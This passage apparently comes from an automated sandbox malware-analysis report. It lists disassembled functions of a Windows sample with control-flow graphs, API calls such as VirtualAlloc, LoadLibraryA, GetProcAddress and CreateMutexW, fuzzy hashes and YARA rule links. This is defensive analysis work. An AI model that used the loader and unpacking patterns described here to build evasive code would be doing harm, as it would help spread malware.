                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID: 6$9+Di$Gs$M4U5$O$pfx8$s<O?(Su(
                                                                                                                                              • API String ID: 4275171209-2690861754
                                                                                                                                              • Opcode ID: 5771f0e1f234e3279db517ca23c00010e8d1b9e8e672e5662b23c37979f35266
                                                                                                                                              • Instruction ID: cd5d1eeb5dad64a7cc3f15a6d20144d3d4e45bed201563ddaa11bfec4b45d5f5
                                                                                                                                              • Opcode Fuzzy Hash: 5771f0e1f234e3279db517ca23c00010e8d1b9e8e672e5662b23c37979f35266
                                                                                                                                              • Instruction Fuzzy Hash: C8C14771F012699FCB24CFA8D9807ADBBB1FF49304F6881AAD845EB341E7749941CB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042B64B Relevance: 15.1, APIs: 10, Instructions: 101memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3214 42b64b-42b668 EnterCriticalSection 3215 42b677-42b67c 3214->3215 3216 42b66a-42b671 3214->3216 3217 42b699-42b6a2 3215->3217 3218 42b67e-42b681 3215->3218 3216->3215 3219 42b72c-42b72f 3216->3219 3223 42b6b4-42b6d0 GlobalHandle GlobalUnlock GlobalReAlloc 3217->3223 3224 42b6a4-42b6b2 GlobalAlloc 3217->3224 3222 42b684-42b687 3218->3222 3220 42b731-42b734 3219->3220 3221 42b737-42b757 LeaveCriticalSection 3219->3221 3220->3221 3225 42b691-42b693 3222->3225 3226 42b689-42b68f 3222->3226 3227 42b6d6-42b6e2 3223->3227 3224->3227 3225->3217 3225->3219 3226->3222 3226->3225 3228 42b704-42b72b GlobalLock call 416700 3227->3228 3229 42b6e4-42b6e9 3227->3229 3228->3219 3230 42b6f5-42b6ff LeaveCriticalSection call 421452 3229->3230 3231 42b6eb-42b6f3 GlobalHandle GlobalLock 3229->3231 3230->3228 3231->3230
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(0044AEF4,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B65A
                                                                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B6AC
                                                                                                                                              • GlobalHandle.KERNEL32(00563488), ref: 0042B6B5
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B6BE
                                                                                                                                              • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 0042B6D0
                                                                                                                                              • GlobalHandle.KERNEL32(00563488), ref: 0042B6EC
                                                                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B6F3
                                                                                                                                              • LeaveCriticalSection.KERNEL32(00429E06,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B6F9
                                                                                                                                              • GlobalLock.KERNEL32(0040C70D,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B708
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0042B74A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2667261700-0
                                                                                                                                              • Opcode ID: 78356631f8aaed9052733949075a33ef6c867759e15218fc8afabd321056c18c
                                                                                                                                              • Instruction ID: 222caff267ab2058375ee3363c8eab48129623bed3694301ddaedbbb3d00f7f7
                                                                                                                                              • Opcode Fuzzy Hash: 78356631f8aaed9052733949075a33ef6c867759e15218fc8afabd321056c18c
                                                                                                                                              • Instruction Fuzzy Hash: 0F3178B23007059FD720DF68EC88A26B7F8FB84300B84493EE892C3650D735EC198B69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025CCCC0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98memorythreadCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3477 25cccc0-25ccd00 SetThreadStackGuarantee 3478 25ccd0d-25ccd30 3477->3478 3479 25ccd02-25ccd0b GetLastError 3477->3479 3484 25ccd52-25ccd75 HeapFree 3478->3484 3485 25ccd32-25ccd36 3478->3485 3479->3478 3480 25ccd78-25ccdde call 25ec9a0 call 25ecf10 3479->3480 3491 25ccde0-25ccde7 3480->3491 3492 25cce03-25cce18 HeapFree 3480->3492 3487 25ccd3d-25ccd40 3485->3487 3488 25ccd38-25ccd3b 3485->3488 3490 25ccd43-25ccd4c HeapFree 3487->3490 3488->3490 3490->3484 3493 25ccde9-25ccdef 3491->3493 3494 25ccdf2-25ccdfd HeapFree 3491->3494 3493->3494 3494->3492
                                                                                                                                              APIs
                                                                                                                                              • SetThreadStackGuarantee.KERNELBASE(?), ref: 025CCCF8
                                                                                                                                              • GetLastError.KERNEL32 ref: 025CCD02
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025CCD4C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CCD5D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CCDFD
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CCE0E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorGuaranteeLastStackThread
                                                                                                                                              • String ID: Invalid
                                                                                                                                              • API String ID: 3680998240-874791708
                                                                                                                                              • Opcode ID: 4399c9994135dbe0c8e17ff92685b5f78a6edf055758ff584c448ca5ad11f9c0
                                                                                                                                              • Instruction ID: 378f2ce3f99fc9cf91ad893b09139878ce20e6bb90375a3415bba80646fabf22
                                                                                                                                              • Opcode Fuzzy Hash: 4399c9994135dbe0c8e17ff92685b5f78a6edf055758ff584c448ca5ad11f9c0
                                                                                                                                              • Instruction Fuzzy Hash: 274169B5D40208DFDF14DF94D948BAEBFB5FB08305F108469E915AB2A0E335A958CF98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00426EB8 Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00426EC5
                                                                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 00426ECC
                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00426ED3
                                                                                                                                              • GetSystemMetrics.USER32(00000003), ref: 00426EDD
                                                                                                                                              • GetDC.USER32(00000000), ref: 00426EE7
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00426EF8
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00426F00
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00426F08
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1031845853-0
                                                                                                                                              • Opcode ID: ed2417dc9456594cdf0b31a88eb29372da527a16b3c658b083092e7c9424d573
                                                                                                                                              • Instruction ID: b3796cda6346f1d9b14e489dd3367e8f14833ca86dd78446ae7436d4847d6f55
                                                                                                                                              • Opcode Fuzzy Hash: ed2417dc9456594cdf0b31a88eb29372da527a16b3c658b083092e7c9424d573
                                                                                                                                              • Instruction Fuzzy Hash: 23F09071A80700AEE3307F729C49F277BB8EBE1B51F51443AE6418B2D0CAF598068F54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02581838 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3612 2581838-258189a call 25c1410 3615 258189c-25818bd call 25c7a30 3612->3615 3616 25818c2-25818cb 3612->3616 3622 25818fb-2581927 call 25c1410 3615->3622 3623 25818bf 3615->3623 3618 25818d1-25818d7 3616->3618 3620 25818d9-25818e4 HeapFree 3618->3620 3621 25818ea-25818fa 3618->3621 3620->3621 3626 2581929-2581948 call 25c7a30 3622->3626 3627 258194d-2581959 3622->3627 3623->3616 3632 258194a 3626->3632 3633 258197d-258199c CopyFileExW 3626->3633 3629 258195f-2581963 3627->3629 3629->3618 3631 2581969 3629->3631 3634 258196a-2581978 HeapFree 3631->3634 3632->3627 3635 258199e-25819b5 3633->3635 3636 25819d6-25819f1 GetLastError 3633->3636 3634->3618 3638 25819c6-25819cd 3635->3638 3639 25819b7-25819c0 HeapFree 3635->3639 3636->3629 3637 25819f7-2581a09 HeapFree 3636->3637 3637->3629 3638->3618 3640 25819d3-25819d4 3638->3640 3639->3638 3640->3634
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,1875003F), ref: 025818E4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02581972
                                                                                                                                              • CopyFileExW.KERNELBASE(?,?,025D0350,00000000,00000000,00000000), ref: 02581994
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025819C0
                                                                                                                                              • GetLastError.KERNEL32 ref: 025819D6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02581A00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CopyErrorFileLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 492081815-0
                                                                                                                                              • Opcode ID: 1438b05f28117d9f75d6dcba2ec398f0a38173480ed7ef601973434d1e5b8115
                                                                                                                                              • Instruction ID: 5f48cb45767b7b1bdc0bbbe7a630f5b1c19ee80415af67046125e967d85d3563
                                                                                                                                              • Opcode Fuzzy Hash: 1438b05f28117d9f75d6dcba2ec398f0a38173480ed7ef601973434d1e5b8115
                                                                                                                                              • Instruction Fuzzy Hash: FC51FFB5600B009FD324CF15C984B62BBF6BB48314F14CA6DD89A8BB91D771A885CF94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025C1A40 Relevance: 9.1, APIs: 6, Instructions: 113timesleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3641 25c1a40-25c1a57 3642 25c1a59-25c1a5b 3641->3642 3643 25c1a61-25c1a77 CreateWaitableTimerExW 3641->3643 3642->3643 3644 25c1b40-25c1b64 3642->3644 3643->3644 3645 25c1a7d-25c1aa8 3643->3645 3646 25c1b85-25c1b8a 3644->3646 3647 25c1b66-25c1b83 3644->3647 3648 25c1aae-25c1ac1 3645->3648 3649 25c1b30-25c1b3d CloseHandle 3645->3649 3651 25c1b8e-25c1b97 Sleep 3646->3651 3647->3646 3650 25c1b8c 3647->3650 3648->3649 3652 25c1ac3 3648->3652 3649->3644 3650->3651 3653 25c1b9a-25c1ba1 3651->3653 3652->3649 3654 25c1ac5-25c1af9 SetWaitableTimer 3652->3654 3654->3649 3655 25c1afb-25c1b2c WaitForSingleObject CloseHandle 3654->3655 3655->3653 3656 25c1b2e 3655->3656 3656->3644
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2261246915-0
                                                                                                                                              • Opcode ID: b71517d2d12b4c1f416029f7367b8b9cada5edf90a6f91c740849bab3563fc43
                                                                                                                                              • Instruction ID: d617cb64646db3a0c9a7aefd691ba625d6e8b3f39b026d3d77bf61dfc31b2835
                                                                                                                                              • Opcode Fuzzy Hash: b71517d2d12b4c1f416029f7367b8b9cada5edf90a6f91c740849bab3563fc43
                                                                                                                                              • Instruction Fuzzy Hash: E841D771A047014FC704DF7C894426EBEE5AB88254F55CB3CE898C7391FA30C554CB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042C6B6 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 239memorylibraryloaderCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3657 42c6b6-42c6f5 VirtualAlloc 3658 42c6f8-42c71e 3657->3658 3658->3658 3659 42c720-42c744 VirtualAlloc 3658->3659 3660 42c74a-42c76a 3659->3660 3661 42c94c 3659->3661 3663 42c783-42c7b7 3660->3663 3664 42c76c-42c772 3660->3664 3662 42c94e-42c954 3661->3662 3663->3661 3666 42c7bd-42c7c0 3663->3666 3665 42c774-42c77b 3664->3665 3665->3665 3668 42c77d-42c780 3665->3668 3667 42c7c2-42c7c7 3666->3667 3669 42c7d9-42c7dc 3667->3669 3670 42c7c9-42c7d1 3667->3670 3668->3663 3672 42c7ee-42c802 3669->3672 3673 42c7de-42c7e6 3669->3673 3670->3669 3671 42c7d3-42c7d6 3670->3671 3671->3669 3675 42c804-42c809 3672->3675 3676 42c81a-42c82a 3672->3676 3673->3672 3674 42c7e8-42c7eb 3673->3674 3674->3672 3677 42c80b-42c812 3675->3677 3676->3667 3678 42c82c-42c831 3676->3678 3677->3677 3679 42c814-42c817 3677->3679 3678->3661 3680 42c837-42c83c 3678->3680 3679->3676 3681 42c893-42c89b 3680->3681 3682 42c83e 3680->3682 3681->3661 3683 42c8a1-42c8aa 3681->3683 3684 42c841-42c859 3682->3684 3685 42c902-42c90d 3683->3685 3686 42c8ac-42c8b9 LoadLibraryA 3683->3686 3687 42c88b-42c88e 3684->3687 3688 42c85b 3684->3688 3690 42c938-42c94a call 25dd76d 3685->3690 3691 42c90f-42c920 3685->3691 3686->3661 3693 42c8bf-42c8ca 3686->3693 3687->3684 3692 42c890 3687->3692 3689 42c85d-42c86f 3688->3689 3694 42c871-42c883 3689->3694 3695 42c885-42c889 3689->3695 3690->3662 3691->3690 3696 42c922 3691->3696 3692->3681 3697 42c8f4-42c8fd 3693->3697 3698 42c8cc 3693->3698 3694->3695 3695->3687 3695->3689 3699 42c925-42c933 3696->3699 3697->3686 3702 42c8ff 3697->3702 3701 42c8cf-42c8d3 3698->3701 3707 42c935 3699->3707 3703 42c8d5-42c8d8 3701->3703 3704 42c8da-42c8dd 3701->3704 3702->3685 3706 42c8df-42c8ec GetProcAddress 3703->3706 3704->3706 3706->3701 3708 42c8ee-42c8f1 3706->3708 3707->3690 3708->3697
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,000C4E00,00003000,00000004), ref: 0042C6C3
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,?,0000001B), ref: 0042C73A
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 0042C8B1
                                                                                                                                              • GetProcAddress.KERNELBASE(?,-00000002), ref: 0042C8E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual$AddressLibraryLoadProc
                                                                                                                                              • String ID: s<O?(Su(
                                                                                                                                              • API String ID: 2938105391-2579506083
                                                                                                                                              • Opcode ID: b3fac43b6f37ce7f2159d76fdb1eea15d15c32a495f9fe60442fcf7cf701a851
                                                                                                                                              • Instruction ID: 98f8efe1d1dce6292f322ff0c0b8de9db3192ba101f6e8a77763a19099652570
                                                                                                                                              • Opcode Fuzzy Hash: b3fac43b6f37ce7f2159d76fdb1eea15d15c32a495f9fe60442fcf7cf701a851
                                                                                                                                              • Instruction Fuzzy Hash: 39A12471E012299FCB14CFA8D980BADBBF1BF49305F6881AAD845EB341D778A941CB54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025BE597 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 203COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3767 25be597-25be5a4 3768 25be5a8 3767->3768 3769 25be5a6 3767->3769 3770 25be5a9 3768->3770 3771 25be623 3768->3771 3769->3768 3772 25be5aa-25be5ac 3770->3772 3773 25be5ad-25be5ae 3770->3773 3774 25be625-25be633 3771->3774 3775 25be664-25be66e 3771->3775 3772->3773 3776 25be5b0-25be5b2 3773->3776 3777 25be576 3773->3777 3778 25be670-25be675 3774->3778 3779 25be635-25be654 3774->3779 3780 25be6a5-25be6a7 3775->3780 3781 25be5c3-25be5f5 3776->3781 3782 25be5b4 3776->3782 3777->3767 3783 25be67a-25be680 3778->3783 3779->3783 3784 25be656-25be65f 3779->3784 3785 25be6a9-25be6e0 call 25cd430 3780->3785 3787 25be5ba-25be5c1 3781->3787 3788 25be5f7-25be60d 3781->3788 3786 25be5b6 3782->3786 3783->3780 3790 25be682-25be6a3 3783->3790 3789 25be8bf-25be8c7 3784->3789 3796 25be9df-25be9ff call 25ec900 GetModuleHandleA 3785->3796 3797 25be6e6-25be70f 3785->3797 3786->3787 3787->3781 3787->3786 3793 25be60f-25be612 3788->3793 3794 25be617-25be621 3788->3794 3795 25be8cb-25be8cf 3789->3795 3790->3785 3793->3780 3794->3771 3798 25be8d1-25be8e1 call 256ea05 3795->3798 3799 25be8e4 3795->3799 3809 25bea01-25bea11 GetProcAddress 3796->3809 3810 25bea30-25bea32 3796->3810 3800 25be714-25be71a 3797->3800 3798->3799 3802 25be8e7-25be8f9 3799->3802 3804 25be720-25be726 3800->3804 3805 25be7c4 3800->3805 3807 25be8fd-25be8ff 3802->3807 3811 25be86a-25be874 3804->3811 3812 25be72c-25be73c 3804->3812 3815 25be7c6-25be7ca 3805->3815 3813 25be92c-25be92e 3807->3813 3814 25be901-25be903 3807->3814 3809->3810 3816 25bea13-25bea23 GetProcAddress 3809->3816 3811->3789 3819 25be876-25be878 3811->3819 3817 25be73e-25be742 3812->3817 3818 25be744-25be75b 3812->3818 3824 25be966-25be97a CreateMutexW GetLastError 3813->3824 3820 25be950-25be961 HeapFree 3814->3820 3821 25be905-25be91e HeapReAlloc 3814->3821 3822 25be7df-25be81c call 25f1823 3815->3822 3823 25be7cc-25be7da 3815->3823 3816->3810 3826 25bea25-25bea2b 3816->3826 3829 25be7c0 3817->3829 3830 25be75d-25be77b 3818->3830 3831 25be7b5-25be7be 3818->3831 3832 25be87a-25be87f 3819->3832 3820->3824 3821->3824 3833 25be920-25be927 call 25ec900 3821->3833 3822->3823 3823->3800 3827 25be97c-25be97f 3824->3827 3828 25be981-25be98e 3824->3828 3826->3810 3827->3828 3835 25be990-25be995 3827->3835 3836 25be9bf-25be9c6 3828->3836 3829->3805 3837 25be81e-25be824 3830->3837 3838 25be781-25be7aa 3830->3838 3831->3829 3839 25be930-25be935 3832->3839 3840 25be885-25be889 3832->3840 3833->3813 3845 25be9ab-25be9b6 3835->3845 3846 25be997-25be9a9 CloseHandle 3835->3846 3849 25be9c8-25be9d1 HeapFree 3836->3849 3850 25be9d7-25be9de 3836->3850 3844 25be826-25be833 3837->3844 3847 25be7b0-25be7b3 3838->3847 3848 25be866 3838->3848 3842 25be93c-25be94b 3839->3842 3843 25be937-25be93a 3839->3843 3840->3832 3851 25be88b-25be899 3840->3851 3842->3850 3843->3824 3852 25be85d-25be861 3844->3852 3853 25be835-25be858 3844->3853 3854 25be9b9 3845->3854 3846->3854 3847->3844 3848->3811 3849->3850 3851->3795 3855 25be89b-25be8a3 3851->3855 3852->3805 3853->3815 3854->3836 3855->3807 3856 25be8a5-25be8a7 3855->3856 3857 25be8ba-25be8bd 3856->3857 3858 25be8a9-25be8b7 call 256ea05 3856->3858 3857->3802 3858->3857
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: VUUU
                                                                                                                                              • API String ID: 0-2040033107
                                                                                                                                              • Opcode ID: 2b3582ded2f59462f7dfd74485a4df2a3a2b4d111fa04d78d3bbe2aa65126484
                                                                                                                                              • Instruction ID: ea19256d3f95c5b865720783486d2e9e279fea0334f6943954ef772bc8db16c1
                                                                                                                                              • Opcode Fuzzy Hash: 2b3582ded2f59462f7dfd74485a4df2a3a2b4d111fa04d78d3bbe2aa65126484
                                                                                                                                              • Instruction Fuzzy Hash: 4F512872A042024FD72A8F29C8423EABBD6BFC5254F59853DD989CB291F731DC06C789
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02581C36 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3861 2581c36-2581c7d call 25d91d2 * 2 call 2581ba7 3868 2581cb9-2581cbf 3861->3868 3869 2581c7f-2581c89 3861->3869 3870 2581cc8-2581cca 3868->3870 3871 2581cc1-2581cc2 SysFreeString 3868->3871 3872 2581c8b-2581c8d 3869->3872 3873 2581c91-2581c93 3869->3873 3874 2581ccc-2581ccd SysFreeString 3870->3874 3875 2581cd3-2581ce6 call 2580194 3870->3875 3871->3870 3872->3873 3876 2581c9c-2581c9e 3873->3876 3877 2581c95-2581c96 SysFreeString 3873->3877 3874->3875 3881 2581ceb-2581cf1 3875->3881 3879 2581ca0-2581ca1 SysFreeString 3876->3879 3880 2581ca7-2581cb4 3876->3880 3877->3876 3879->3880 3882 2581e0b-2581e12 3880->3882 3883 2581db6-2581dca 3881->3883 3884 2581cf7-2581d3c call 25836d9 call 2580194 3881->3884 3887 2581dce-2581dd6 3883->3887 3893 2581d3e-2581d41 3884->3893 3894 2581d96-2581db4 3884->3894 3889 2581dd8-2581df4 3887->3889 3890 2581df6-2581e06 call 2581bfe 3887->3890 3889->3882 3890->3882 3895 2581d46-2581d4a 3893->3895 3894->3887 3897 2581d4c-2581d81 call 2580194 3895->3897 3898 2581d85-2581d94 call 25eeb2c 3895->3898 3897->3895 3903 2581d83 3897->3903 3898->3897 3903->3894
                                                                                                                                              APIs
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02581C96
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02581CA1
                                                                                                                                                • Part of subcall function 02581BFE: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,02581E0B), ref: 02581C2B
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02581CC2
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02581CCD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$String$Heap
                                                                                                                                              • String ID: WQL
                                                                                                                                              • API String ID: 4134718113-1249411209
